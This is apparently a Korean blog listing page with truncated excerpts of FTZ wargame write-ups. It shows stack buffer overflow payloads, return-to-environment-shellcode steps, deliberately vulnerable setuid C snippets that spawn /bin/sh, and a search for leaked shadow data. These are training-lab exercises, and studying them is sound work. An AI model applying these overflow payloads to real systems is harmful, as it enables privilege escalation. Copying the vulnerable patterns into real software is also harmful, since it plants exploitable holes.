둘둘리둘둘리둘둘리둘둘리둘둘리둘

#include main(){ int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) { setreuid(3096,3096); system("/bin/sh"); }} Level14에서 한번 꼬았다.. check가 가진값이 아니라 check가 가리키는곳의 값이 0xdeadbeef인지 검사후 맞으면 쉘을 띄워준다. 풀이는 level14(http://dool2ly.tistory.com/21)와 다를게 없지만, check에 0xdeadbeef를 넣어줄게 아니라 0xdeadbeef를 가진 주소를 넣어줘야 한다. 0xdeadbeef는 이미 main함수에 하드코딩 돼있으니 그 값을 가져다 쓰면 되겠다. 페이로드 : [ dummy..

buf의 공간은 20byte인데 fgets로 stdin에서 최대 45byte까지 입력받은 뒤 check의 값이 0xdeadbeef인지 확인하고 맞으면 쉘을 띄워준다. [그림 1] [그림 1]을 보면 check가 ebp-16, buf가 ebp-60이니까 60-16=44Byte를 더미로 주고 그 후 부터 0xdeadbeef를 체우면 메인함수를 정상종료 시킬 수 있다. --풀이--[level14@ftz tmp]$ (python -c 'print "A"*40+"\xef\xbe\xad\xde"';cat)|../attackmeiduid=3095(level15) gid=3094(level14) groups=3094(level14)my-pass Level15 Password is "----- ----".

소스로 봐선 스택구조가 [그림 1]로 추측되는데 Canary(또는 Security Cookie)처럼 Return address변조를 위해서 어쩔 수 없이 덮어 씌워지는 변수 i의 영역의 변화 유무를 검사하여 메인 함수가 종료되기전에 자기 자신에 SIGSEGV(Segmentation Violation) 신호를 보내 종료시킨다. buf[1024] i[4] SFP[4] RET [그림 1] [그림 2] GDB로 까보면 내부는 [그림 2]와 같다 에서 esp를 ebp-1048까지 키우고 ebp-12와 0x1234567을 비교하는걸로 봐선 buf+더미의 크기가 1048-12= 1036byte로 알 수 있다. 변수 i+더미의 크기는.. 아래와 같이 12byte로 확인된다 그러므로 페이로드는 아래와 같이 짜면 되겠다...

Level11문제랑 또옥같이 풀어도 된다, 차이점은 입력값을 메인함수의 argument에서 얻느냐 Stdin에서 얻느냐 차이.. 물론 gets와 strcpy의 동작방식은 다르겠지만 목적은 버퍼 오버플로우니까.. level11 Write up >> http://dool2ly.tistory.com/18 --풀이--환경변수 주소 획득(환경변수 sh에는 Level11에서 썼던 NOP*2000+쉘코드가 여전히 들어있다) 실행페이로드 : [ 더미*268 | 0xbffff71a ]

setreuid도 되있겠다 단순히 쉘만 띄우면 되겠다. 쉘코드를 str에 넣고 str의 주소로 리턴해도 되겠지만 시도해 본 결과 스택이 랜덤하게 바뀐다(ASLR),RTL을 쓰거나 쉘코드가 담긴 변수를 환경변수로 등록하고 환경변수의 주소로 리턴하거나, 메인함수의 인자2에 넣고 디버깅하여 인자2의 주소를 찾아도 된다. 쉘코드는 exploit-db.com에서 얻거나 검색을 활용하여 직접 만들면 된다. ※원본파일은 다른유저로 setuid가 걸려있기 때문에 디버깅할 수 없다, ~/tmp 디렉토리로 복사해서 분석하고 원본파일에 공격해야한다 --풀이--환경변수(NOP+쉘코드)등록후 확인 환경변수의 주소 획득 main함수의 리턴주소를 환경변수 주소로 오버라이트(페이로드를 [ 더미268개 | 환경변수주소 ]로 해도되는데..

공유 메모리는 이름 그대로 여러 프로세스가 함께 사용하는 메모리이다. key_t값 7530으로 공유메모리에 접근해서 내용을 읽어 오면 되겠다shmget() //공유 메모리 식별자 획득shmat() //공유 메모리의 주소 획득 --풀이--[level10@ftz tmp]$ cat ./t.c#include #include #include int main(){ int shm_id; void *shm_addr; shm_id = shmget( (key_t)7530, 1024,0); shm_addr = shmat( shm_id, 0, 0); printf("%s\n",(char *)shm_addr); return 0;}[level10@ftz tmp]$[level10@ftz tmp]$ gcc ./t.c[level10@f..

10byte 크기 buf, buf2가 있고 fgets로 40byte를 표준입력에서 받아와 buf에 넣는다. buf에 입력을 받고 buf2를 "go"와 비교해서 맞으면 쉘을 띄워준다..소스를 보고 스택을 유추해보면 대충 [그림 1]과 같다. Low address buf (10byte) buf2 (10byte) SFP RETHigh address[그림 1] buf가 10byte이니까 fgets에서 더미로 10byte를 체우고 go 를 입력하면 될것같지만 buf와 buf2사이에 CPU가 처리하기 편하도록 줄을 맞추기 위해 쓰레기값이 들어가기 때문에 아래 결과처럼 생각처럼 성공하지 않을것이다. 그럼 디버거로 buf크기를 구해야 할탠데 아래처럼 bof파일에는 setuid가 level10권한으로 걸려있어서 디버거로..

hint를 단서로 find의 -size N[bckw] 옵션을 이용해서 찾아보면 ..(b: 블록, c:바이트, k:키로바이트, w:2바이트 워드)[level8@ftz level8]$ find / -size 2700b 2>/dev/null[level8@ftz level8]$ find / -size 2700c 2>/dev/null/var/www/manual/ssl/ssl_intro_fig2.gif/etc/rc.d/found.txt/usr/share/man/man3/IO::Pipe.3pm.gz/usr/share/man/man3/URI::data.3pm.gz 상당히 수상해 보이는 found.txt가 있는고, 파일을 열어보면 level9의 shadow 데이터가 나온다.[level8@ftz level8]$ cat /..

실행 화면은 이렇다 .. [level7@ftz tmp]$ /bin/level7Insert The Password : aaaacat: /bin/wrong.txt: No such file or directory /bin/level7을 실행하면 먼저 문자열을 입력받고 cat으로 /bin/wrong.txt를 보여주려는것 같은데 cat이 /bin/wrong.txt를 찾을 수 없다고 한다. [level7@ftz tmp]$ ls -l /total 197drwxr-xr-x 2 root root 4096 Sep 10 2011 bin 물론 level7에겐 /bin 디렉토리에 쓰기권한이 없다. 다른 글을 보면 wrong.txt의 내용은 이렇다. 올바르지 않은 패스워드 입니다. 패스워드는 가까운곳에...--_--_- --__..

옛날 옛쩍 천리안,나온누리등의 텔넷 서비스있던 시절의 버그?를 이용하는 문제라 문제 자체가 취소된거같다 password파일이 있다.